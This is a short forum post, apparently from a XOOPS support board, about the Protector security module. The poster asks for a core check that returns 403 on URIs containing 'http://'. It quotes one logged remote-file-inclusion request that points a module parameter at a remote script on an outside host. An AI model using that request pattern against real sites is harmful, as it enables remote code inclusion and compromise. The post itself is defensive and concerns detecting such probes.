12
Quote:
Protector hopefully will not be required for XOOPS 2.3.1, we are working on a solution for common problems that this module deals with.
That's great, I have used Protector for a while now, good to hear that the XOOPS core will give a website, at least the same 'protection'.
I see a fair bit of this in web logs ..
221.143.43.214 - - [05/Jul/2008:16:33:27 +1000] "GET /user.php//modify.php?dir_module=http://starhc.com/FormTools1_5_0//global/templates/r.txt?? HTTP/1.1" 200 5977 "-" "libwww-perl/5.79"
and rather than a 200 being returned, I'd like a simple (one line ??) mod to search for 'http://' in the request URI. With Protector installed, these are returning a 200, a 403 would be more appropriate.
I realise the way each website server is configured can play a role here, but even if there was at least an option, to return a 403 if 'http://' was found in the URI. That way, at least some of the malicious activity could be recorded, at present it goes unnoticed (unless someone wants to wade through web server logs).
NO to the Microsoft Office format as an ISO standard. Sign the
petition
